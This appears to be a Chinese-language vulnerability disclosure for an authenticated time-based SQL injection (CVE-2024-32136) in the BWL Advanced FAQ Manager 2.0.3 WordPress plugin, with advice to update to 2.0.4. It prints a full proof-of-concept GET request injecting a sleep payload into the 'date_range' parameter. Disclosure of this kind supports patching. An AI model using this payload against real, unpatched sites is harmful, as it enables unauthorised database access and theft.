漏洞标题: BWL Advanced FAQ Manager 2.0.3 - 认证后SQL注入
日期: 2024年4月14日
漏洞作者: Ivan Spiridonov (xbz0n)
软件链接: https://codecanyon.net/item/bwl-advanced-faq-manager/5007135
版本: 2.0.3
测试环境: Ubuntu 20.04
CVE: CVE-2024-32136
SQL注入是一种安全漏洞,允许攻击者干扰应用程序的数据库查询。它通常涉及通过客户端输入数据向应用程序插入或“注入”SQL查询。成功的SQL注入漏洞利用可以读取数据库中的敏感数据、修改数据库数据(插入/更新/删除)、执行数据库管理操作(例如关闭DBMS)、恢复DBMS文件系统中存在的指定文件的内容,并且在某些情况下,还可以向操作系统发出命令。
该漏洞存在于 BWL Advanced FAQ Manager 插件 'bwl-advanced-faq-analytics' 页面使用的 'date_range' 参数中。经过身份验证的攻击者可以通过操纵此参数的输入来在数据库中执行任意SQL命令。
以下 GET 请求演示了该漏洞:
GET /wp-admin/edit.php?page=bwl-advanced-faq-analytics&post_type=bwl_advanced_faq&filter_type=views&date_range=(select*from(select(sleep(20)))a)&faq_id=all HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://localhost/wp-admin/edit.php?post_type=bwl_advanced_faq&page=bwl-advanced-faq-analytics
Connection: close
Cookie: [Relevant Cookies]
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
如果服务器响应延迟大约20秒,则表示基于时间的SQL注入漏洞利用成功,从而确认该漏洞。
建议 BWL Advanced FAQ Manager v2.0.3 的用户将插件更新到修复版本 v2.0.4。